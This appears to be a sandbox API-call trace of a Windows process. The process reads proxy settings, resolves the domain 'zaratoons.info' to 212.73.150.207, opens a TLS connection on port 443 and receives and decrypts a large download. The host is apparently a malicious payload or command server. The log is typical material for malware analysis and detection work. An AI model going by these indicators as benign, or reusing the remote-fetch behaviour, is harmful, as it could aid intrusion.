	[0899.466] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c89dc60 | out: phkResult=0x1c89dc60*=0x434) returned 0x0
	[0899.466] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438
	[0899.466] RegNotifyChangeKeyValue (hKey=0x434, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x438, fAsynchronous=1) returned 0x0
	[0899.466] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c89dc60 | out: phkResult=0x1c89dc60*=0x43c) returned 0x0
	[0899.467] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x440
	[0899.467] RegNotifyChangeKeyValue (hKey=0x43c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x440, fAsynchronous=1) returned 0x0
	[0899.467] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.467] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89dbc8 | out: TokenHandle=0x1c89dbc8*=0x444) returned 1
	[0899.475] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.475] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d398 | out: TokenHandle=0x1c89d398*=0x448) returned 1
	[0899.480] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.481] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d398 | out: TokenHandle=0x1c89d398*=0x44c) returned 1
	[0899.501] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c89dc98 | out: pProxyConfig=0x1c89dc98) returned 1
	[0901.001] SetEvent (hEvent=0x35c) returned 1
	[0901.351] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.351] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d408 | out: TokenHandle=0x1c89d408*=0x4a4) returned 1
	[0901.355] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.355] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d408 | out: TokenHandle=0x1c89d408*=0x4a8) returned 1
	[0901.356] SetEvent (hEvent=0x35c) returned 1
	[0901.849] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c89d8d8 | out: pFixedInfo=0x0, pOutBufLen=0x1c89d8d8) returned 0x6f
	[0902.043] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b995590
	[0902.043] GetNetworkParams (in: pFixedInfo=0x1b995590, pOutBufLen=0x1c89d8d8 | out: pFixedInfo=0x1b995590, pOutBufLen=0x1c89d8d8) returned 0x0
	[0902.054] CoTaskMemAlloc (cb=0xd) returned 0x2015f0
	[0902.054] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0902.054] CoTaskMemFree (pv=0x2015f0) 
	[0902.057] LocalFree (hMem=0x1b995590) returned 0x0
	[0902.068] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4bc
	[0902.069] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b8
	[0902.070] CoTaskMemAlloc (cb=0x10) returned 0x2015f0
	[0902.071] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c89d880*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c89d878 | out: ppResult=0x1c89d878*=0x1b978650*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x2017f0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0904.509] CoTaskMemFree (pv=0x2015f0) 
	[0904.509] CoTaskMemFree (pv=0x0) 
	[0904.510] FreeAddrInfoW (pAddrInfo=0x1b978650*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x2017f0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0904.511] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc
	[0904.512] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c4
	[0904.512] ioctlsocket (in: s=0x4cc, cmd=-2147195266, argp=0x1c89d898 | out: argp=0x1c89d898) returned 0
	[0904.512] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d4
	[0904.512] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d8
	[0904.512] ioctlsocket (in: s=0x4d4, cmd=-2147195266, argp=0x1c89d898 | out: argp=0x1c89d898) returned 0
	[0904.512] WSAIoctl (in: s=0x4cc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c89d810, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c89d810, lpOverlapped=0x0) returned -1
	[0904.512] CoTaskMemAlloc (cb=0x204) returned 0x23a250
	[0904.512] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x23a250, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0904.512] CoTaskMemFree (pv=0x23a250) 
	[0904.513] WSAEventSelect (s=0x4cc, hEventObject=0x4c4, lNetworkEvents=512) returned 0
	[0904.513] WSAIoctl (in: s=0x4d4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c89d810, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c89d810, lpOverlapped=0x0) returned -1
	[0904.513] CoTaskMemAlloc (cb=0x204) returned 0x23a250
	[0904.513] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x23a250, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0904.513] CoTaskMemFree (pv=0x23a250) 
	[0904.513] WSAEventSelect (s=0x4d4, hEventObject=0x4d8, lNetworkEvents=512) returned 0
	[0904.515] GetAdaptersAddresses () returned 0x6f
	[0905.308] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b9a1320
	[0905.308] GetAdaptersAddresses () returned 0x0
	[0905.318] LocalFree (hMem=0x1b9a1320) returned 0x0
	[0905.321] WSAConnect (in: s=0x4bc, name=0x2f2e1f0*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0906.510] closesocket (s=0x4b8) returned 0
	[0906.884] EnumerateSecurityPackagesW (in: pcPackages=0x1c89d6f8, ppPackageInfo=0x1c89d6f0 | out: pcPackages=0x1c89d6f8, ppPackageInfo=0x1c89d6f0) returned 0x0
	[0906.888] lstrlenW (lpString="Negotiate") returned 9
	[0906.889] CoTaskMemAlloc (cb=0x16) returned 0x2017d0
	[0906.889] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220b90, Length=0x14 | out: Destination=0x2017d0) 
	[0906.889] CoTaskMemFree (pv=0x2017d0) 
	[0906.889] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0906.889] CoTaskMemAlloc (cb=0x3c) returned 0x200730
	[0906.889] RtlMoveMemory (in: Destination=0x200730, Source=0x220ba4, Length=0x3a | out: Destination=0x200730) 
	[0906.889] CoTaskMemFree (pv=0x200730) 
	[0906.889] lstrlenW (lpString="NegoExtender") returned 12
	[0906.889] CoTaskMemAlloc (cb=0x1c) returned 0x1b97bb80
	[0906.889] RtlMoveMemory (in: Destination=0x1b97bb80, Source=0x220bde, Length=0x1a | out: Destination=0x1b97bb80) 
	[0906.889] CoTaskMemFree (pv=0x1b97bb80) 
	[0906.889] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0906.889] CoTaskMemAlloc (cb=0x3e) returned 0x200730
	[0906.889] RtlMoveMemory (in: Destination=0x200730, Source=0x220bf8, Length=0x3c | out: Destination=0x200730) 
	[0906.889] CoTaskMemFree (pv=0x200730) 
	[0906.889] lstrlenW (lpString="Kerberos") returned 8
	[0906.889] CoTaskMemAlloc (cb=0x14) returned 0x2017d0
	[0906.889] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220c34, Length=0x12 | out: Destination=0x2017d0) 
	[0906.889] CoTaskMemFree (pv=0x2017d0) 
	[0906.889] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0906.889] CoTaskMemAlloc (cb=0x32) returned 0x1b978910
	[0906.889] RtlMoveMemory (in: Destination=0x1b978910, Source=0x220c46, Length=0x30 | out: Destination=0x1b978910) 
	[0906.889] CoTaskMemFree (pv=0x1b978910) 
	[0906.890] lstrlenW (lpString="NTLM") returned 4
	[0906.890] CoTaskMemAlloc (cb=0xc) returned 0x2017d0
	[0906.890] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220c76, Length=0xa | out: Destination=0x2017d0) 
	[0906.890] CoTaskMemFree (pv=0x2017d0) 
	[0906.890] lstrlenW (lpString="NTLM Security Package") returned 21
	[0906.890] CoTaskMemAlloc (cb=0x2e) returned 0x1b978910
	[0906.890] RtlMoveMemory (in: Destination=0x1b978910, Source=0x220c80, Length=0x2c | out: Destination=0x1b978910) 
	[0906.890] CoTaskMemFree (pv=0x1b978910) 
	[0906.890] lstrlenW (lpString="Schannel") returned 8
	[0906.890] CoTaskMemAlloc (cb=0x14) returned 0x2017d0
	[0906.890] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220cac, Length=0x12 | out: Destination=0x2017d0) 
	[0906.890] CoTaskMemFree (pv=0x2017d0) 
	[0906.890] lstrlenW (lpString="Schannel Security Package") returned 25
	[0906.890] CoTaskMemAlloc (cb=0x36) returned 0x1b978910
	[0906.890] RtlMoveMemory (in: Destination=0x1b978910, Source=0x220cbe, Length=0x34 | out: Destination=0x1b978910) 
	[0906.890] CoTaskMemFree (pv=0x1b978910) 
	[0906.890] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0906.890] CoTaskMemAlloc (cb=0x5c) returned 0x1b9729c0
	[0906.890] RtlMoveMemory (in: Destination=0x1b9729c0, Source=0x220cf2, Length=0x5a | out: Destination=0x1b9729c0) 
	[0906.890] CoTaskMemFree (pv=0x1b9729c0) 
	[0906.890] lstrlenW (lpString="Schannel Security Package") returned 25
	[0906.890] CoTaskMemAlloc (cb=0x36) returned 0x1b978910
	[0906.890] RtlMoveMemory (in: Destination=0x1b978910, Source=0x220d4c, Length=0x34 | out: Destination=0x1b978910) 
	[0906.890] CoTaskMemFree (pv=0x1b978910) 
	[0906.890] lstrlenW (lpString="WDigest") returned 7
	[0906.890] CoTaskMemAlloc (cb=0x12) returned 0x2017d0
	[0906.890] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220d80, Length=0x10 | out: Destination=0x2017d0) 
	[0906.890] CoTaskMemFree (pv=0x2017d0) 
	[0906.890] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0906.890] CoTaskMemAlloc (cb=0x46) returned 0x200730
	[0906.890] RtlMoveMemory (in: Destination=0x200730, Source=0x220d90, Length=0x44 | out: Destination=0x200730) 
	[0906.891] CoTaskMemFree (pv=0x200730) 
	[0906.891] lstrlenW (lpString="TSSSP") returned 5
	[0906.891] CoTaskMemAlloc (cb=0xe) returned 0x2017d0
	[0906.891] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220dd4, Length=0xc | out: Destination=0x2017d0) 
	[0906.891] CoTaskMemFree (pv=0x2017d0) 
	[0906.891] lstrlenW (lpString="TS Service Security Package") returned 27
	[0906.891] CoTaskMemAlloc (cb=0x3a) returned 0x200730
	[0906.891] RtlMoveMemory (in: Destination=0x200730, Source=0x220de0, Length=0x38 | out: Destination=0x200730) 
	[0906.891] CoTaskMemFree (pv=0x200730) 
	[0906.891] lstrlenW (lpString="pku2u") returned 5
	[0906.891] CoTaskMemAlloc (cb=0xe) returned 0x2017d0
	[0906.891] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220e18, Length=0xc | out: Destination=0x2017d0) 
	[0906.891] CoTaskMemFree (pv=0x2017d0) 
	[0906.891] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0906.891] CoTaskMemAlloc (cb=0x30) returned 0x1b978910
	[0906.891] RtlMoveMemory (in: Destination=0x1b978910, Source=0x220e24, Length=0x2e | out: Destination=0x1b978910) 
	[0906.891] CoTaskMemFree (pv=0x1b978910) 
	[0906.891] lstrlenW (lpString="CREDSSP") returned 7
	[0906.891] CoTaskMemAlloc (cb=0x12) returned 0x2017d0
	[0906.891] RtlMoveMemory (in: Destination=0x2017d0, Source=0x220e52, Length=0x10 | out: Destination=0x2017d0) 
	[0906.891] CoTaskMemFree (pv=0x2017d0) 
	[0906.891] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0906.891] CoTaskMemAlloc (cb=0x4a) returned 0x1b993390
	[0906.891] RtlMoveMemory (in: Destination=0x1b993390, Source=0x220e62, Length=0x48 | out: Destination=0x1b993390) 
	[0906.891] CoTaskMemFree (pv=0x1b993390) 
	[0906.892] FreeContextBuffer (in: pvContextBuffer=0x220a50 | out: pvContextBuffer=0x220a50) returned 0x0
	[0906.899] GetCurrentProcess () returned 0xffffffffffffffff
	[0906.899] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d1d8 | out: TokenHandle=0x1c89d1d8*=0x4b8) returned 1
	[0906.903] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2f323a8, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c89d0e8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c89d0d8, ptsExpiry=0x1c89d0d0 | out: phCredential=0x1c89d0d8, ptsExpiry=0x1c89d0d0) returned 0x0
	[0907.250] InitializeSecurityContextW (in: phCredential=0x1c89d2e0, phContext=0x0, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c89d2d0, pOutput=0x2f34af0, pfContextAttr=0x1c89d2c8, ptsExpiry=0x1c89d2c0 | out: phNewContext=0x1c89d2d0, pOutput=0x2f34af0, pfContextAttr=0x1c89d2c8, ptsExpiry=0x1c89d2c0) returned 0x90312
	[0907.250] FreeContextBuffer (in: pvContextBuffer=0x1b9732b0 | out: pvContextBuffer=0x1b9732b0) returned 0x0
	[0907.257] send (s=0x4bc, buf=0x2f34bc0*, len=118, flags=0) returned 118
	[0907.259] recv (in: s=0x4bc, buf=0x2f34bc0, len=5, flags=0 | out: buf=0x2f34bc0*) returned 5
	[0907.637] recv (in: s=0x4bc, buf=0x2f34bc5, len=93, flags=0 | out: buf=0x2f34bc5*) returned 93
	[0907.637] InitializeSecurityContextW (in: phCredential=0x1c89d200, phContext=0x1c89d4b0, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f34ed0, Reserved2=0x0, phNewContext=0x1c89d1f0, pOutput=0x2f34ef0, pfContextAttr=0x1c89d1e8, ptsExpiry=0x1c89d1e0 | out: phNewContext=0x1c89d1f0, pOutput=0x2f34ef0, pfContextAttr=0x1c89d1e8, ptsExpiry=0x1c89d1e0) returned 0x90312
	[0907.638] recv (in: s=0x4bc, buf=0x2f34fe0, len=5, flags=0 | out: buf=0x2f34fe0*) returned 5
	[0907.638] recv (in: s=0x4bc, buf=0x2f35005, len=2556, flags=0 | out: buf=0x2f35005*) returned 2556
	[0907.638] InitializeSecurityContextW (in: phCredential=0x1c89d130, phContext=0x1c89d3e0, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f35ad8, Reserved2=0x0, phNewContext=0x1c89d120, pOutput=0x2f35af8, pfContextAttr=0x1c89d118, ptsExpiry=0x1c89d110 | out: phNewContext=0x1c89d120, pOutput=0x2f35af8, pfContextAttr=0x1c89d118, ptsExpiry=0x1c89d110) returned 0x90312
	[0907.638] recv (in: s=0x4bc, buf=0x2f35be8, len=5, flags=0 | out: buf=0x2f35be8*) returned 5
	[0907.638] recv (in: s=0x4bc, buf=0x2f35c0d, len=331, flags=0 | out: buf=0x2f35c0d*) returned 331
	[0907.638] InitializeSecurityContextW (in: phCredential=0x1c89d060, phContext=0x1c89d310, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f35e28, Reserved2=0x0, phNewContext=0x1c89d050, pOutput=0x2f35e48, pfContextAttr=0x1c89d048, ptsExpiry=0x1c89d040 | out: phNewContext=0x1c89d050, pOutput=0x2f35e48, pfContextAttr=0x1c89d048, ptsExpiry=0x1c89d040) returned 0x90312
	[0907.639] recv (in: s=0x4bc, buf=0x2f35f38, len=5, flags=0 | out: buf=0x2f35f38*) returned 5
	[0907.639] recv (in: s=0x4bc, buf=0x2f35f5d, len=4, flags=0 | out: buf=0x2f35f5d*) returned 4
	[0907.639] InitializeSecurityContextW (in: phCredential=0x1c89cf90, phContext=0x1c89d240, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f36038, Reserved2=0x0, phNewContext=0x1c89cf80, pOutput=0x2f36058, pfContextAttr=0x1c89cf78, ptsExpiry=0x1c89cf70 | out: phNewContext=0x1c89cf80, pOutput=0x2f36058, pfContextAttr=0x1c89cf78, ptsExpiry=0x1c89cf70) returned 0x90312
	[0907.645] FreeContextBuffer (in: pvContextBuffer=0x1b94f360 | out: pvContextBuffer=0x1b94f360) returned 0x0
	[0907.645] send (s=0x4bc, buf=0x2f36128*, len=134, flags=0) returned 134
	[0907.645] recv (in: s=0x4bc, buf=0x2f36128, len=5, flags=0 | out: buf=0x2f36128*) returned 5
	[0907.814] recv (in: s=0x4bc, buf=0x2f3612d, len=1, flags=0 | out: buf=0x2f3612d*) returned 1
	[0907.814] InitializeSecurityContextW (in: phCredential=0x1c89cec0, phContext=0x1c89d170, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f362a0, Reserved2=0x0, phNewContext=0x1c89ceb0, pOutput=0x2f362c0, pfContextAttr=0x1c89cea8, ptsExpiry=0x1c89cea0 | out: phNewContext=0x1c89ceb0, pOutput=0x2f362c0, pfContextAttr=0x1c89cea8, ptsExpiry=0x1c89cea0) returned 0x90312
	[0908.035] recv (in: s=0x4bc, buf=0x2f363b0, len=5, flags=0 | out: buf=0x2f363b0*) returned 5
	[0908.035] recv (in: s=0x4bc, buf=0x2f363d5, len=48, flags=0 | out: buf=0x2f363d5*) returned 48
	[0908.035] InitializeSecurityContextW (in: phCredential=0x1c89cdf0, phContext=0x1c89d0a0, pTargetName=0x2f26e10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f364d8, Reserved2=0x0, phNewContext=0x1c89cde0, pOutput=0x2f364f8, pfContextAttr=0x1c89cdd8, ptsExpiry=0x1c89cdd0 | out: phNewContext=0x1c89cde0, pOutput=0x2f364f8, pfContextAttr=0x1c89cdd8, ptsExpiry=0x1c89cdd0) returned 0x0
	[0908.067] QueryContextAttributesW (in: phContext=0x1c89d050, ulAttribute=0x4, pBuffer=0x2f36610 | out: pBuffer=0x2f36610) returned 0x0
	[0908.067] QueryContextAttributesW (in: phContext=0x1c89d050, ulAttribute=0x5a, pBuffer=0x2f36690 | out: pBuffer=0x2f36690) returned 0x0
	[0908.074] QueryContextAttributesW (in: phContext=0x1c89cf00, ulAttribute=0x53, pBuffer=0x2f369e0 | out: pBuffer=0x2f369e0) returned 0x0
	[0908.079] CertDuplicateCRLContext (pCrlContext=0x1b9695f0) returned 0x1b9695f0
	[0908.082] CertDuplicateStore (hCertStore=0x1b95aea0) returned 0x1b95aea0
	[0908.082] CertEnumCertificatesInStore (hCertStore=0x1b95aea0, pPrevCertContext=0x0) returned 0x1b969670
	[0908.083] CertDuplicateCRLContext (pCrlContext=0x1b969670) returned 0x1b969670
	[0908.083] CertEnumCertificatesInStore (hCertStore=0x1b95aea0, pPrevCertContext=0x1b969670) returned 0x1b9695f0
	[0908.083] CertDuplicateCRLContext (pCrlContext=0x1b9695f0) returned 0x1b9695f0
	[0908.083] CertEnumCertificatesInStore (hCertStore=0x1b95aea0, pPrevCertContext=0x1b9695f0) returned 0x0
	[0908.083] CertCloseStore (hCertStore=0x1b95aea0, dwFlags=0x0) returned 1
	[0908.083] CertFreeCRLContext (pCrlContext=0x1b9695f0) returned 1
	[0909.040] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b95af70
	[0909.041] CertAddCRLLinkToStore (in: hCertStore=0x1b95af70, pCrlContext=0x1b969670, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.041] CertAddCRLLinkToStore (in: hCertStore=0x1b95af70, pCrlContext=0x1b9695f0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.044] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b9695f0, pTime=0x1c89cf08, hAdditionalStore=0x1b95af70, pChainPara=0x1c89cf10, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c89cf00 | out: ppChainContext=0x1c89cf00) returned 1
	[0914.655] CertDuplicateCertificateChain (pChainContext=0x1ccdceb0) returned 0x1ccdceb0
	[0914.657] CertDuplicateCRLContext (pCrlContext=0x1b9695f0) returned 0x1b9695f0
	[0914.657] CertDuplicateCRLContext (pCrlContext=0x1cd206a0) returned 0x1cd206a0
	[0914.657] CertDuplicateCRLContext (pCrlContext=0x1cd20720) returned 0x1cd20720
	[0914.657] CertFreeCertificateChain (pChainContext=0x1ccdceb0) 
	[0914.658] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ccdceb0, pPolicyPara=0x1c89d088, pPolicyStatus=0x1c89d068 | out: pPolicyStatus=0x1c89d068) returned 1
	[0914.667] SetLastError (dwErrCode=0x0) 
	[0914.671] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ccdceb0, pPolicyPara=0x1c89d160, pPolicyStatus=0x1c89d148 | out: pPolicyStatus=0x1c89d148) returned 1
	[0914.673] CertFreeCertificateChain (pChainContext=0x1ccdceb0) 
	[0914.674] CertFreeCRLContext (pCrlContext=0x1b9695f0) returned 1
	[0914.678] EncryptMessage (in: phContext=0x1c89d710, fQOP=0x0, pMessage=0x2f39110, MessageSeqNo=0x0 | out: pMessage=0x2f39110) returned 0x0
	[0914.678] send (s=0x4bc, buf=0x2f38e50*, len=117, flags=0) returned 117
	[0914.692] setsockopt (s=0x4bc, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0914.692] recv (in: s=0x4bc, buf=0x2f39270, len=5, flags=0 | out: buf=0x2f39270*) returned 5
	[0915.050] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1067
	[0915.050] recv (in: s=0x4bc, buf=0x2f396c0, len=15349, flags=0 | out: buf=0x2f396c0*) returned 9648
	[0915.770] recv (in: s=0x4bc, buf=0x2f3bc70, len=5701, flags=0 | out: buf=0x2f3bc70*) returned 5701
	[0916.191] DecryptMessage (in: phContext=0x1c89d2d0, pMessage=0x2f3d3c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f3d3c8, pfQOP=0x0) returned 0x0
	[0916.238] setsockopt (s=0x4bc, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0916.251] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0916.251] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 5014
	[0916.251] recv (in: s=0x4bc, buf=0x2f3a62b, len=11402, flags=0 | out: buf=0x2f3a62b*) returned 11402
	[0916.505] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5e9d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5e9d8, pfQOP=0x0) returned 0x0
	[0916.506] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0916.506] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 2529
	[0916.506] recv (in: s=0x4bc, buf=0x2f39c76, len=13887, flags=0 | out: buf=0x2f39c76*) returned 13887
	[0916.882] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5ec18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5ec18, pfQOP=0x0) returned 0x0
	[0916.882] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0916.882] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 2724
	[0916.882] recv (in: s=0x4bc, buf=0x2f39d39, len=13692, flags=0 | out: buf=0x2f39d39*) returned 13692
	[0917.287] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5ee58, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5ee58, pfQOP=0x0) returned 0x0
	[0917.287] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0917.288] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 239
	[0917.289] recv (in: s=0x4bc, buf=0x2f39384, len=16177, flags=0 | out: buf=0x2f39384*) returned 2144
	[0917.290] recv (in: s=0x4bc, buf=0x2f39be4, len=14033, flags=0 | out: buf=0x2f39be4*) returned 14033
	[0917.652] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5f098, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5f098, pfQOP=0x0) returned 0x0
	[0917.654] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0917.654] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 4186
	[0917.654] recv (in: s=0x4bc, buf=0x2f3a2ef, len=12230, flags=0 | out: buf=0x2f3a2ef*) returned 12230
	[0917.923] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5f328, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5f328, pfQOP=0x0) returned 0x0
	[0917.924] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0917.924] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 2773
	[0917.924] recv (in: s=0x4bc, buf=0x2f39d6a, len=13643, flags=0 | out: buf=0x2f39d6a*) returned 13643
	[0918.557] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5f568, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5f568, pfQOP=0x0) returned 0x0
	[0918.558] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0918.558] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 288
	[0918.558] recv (in: s=0x4bc, buf=0x2f393b5, len=16128, flags=0 | out: buf=0x2f393b5*) returned 16128
	[0918.760] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5f7a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5f7a8, pfQOP=0x0) returned 0x0
	[0918.761] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0918.761] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1555
	[0918.761] recv (in: s=0x4bc, buf=0x2f398a8, len=14861, flags=0 | out: buf=0x2f398a8*) returned 14861
	[0918.995] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5fa10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5fa10, pfQOP=0x0) returned 0x0
	[0918.995] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0918.995] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 142
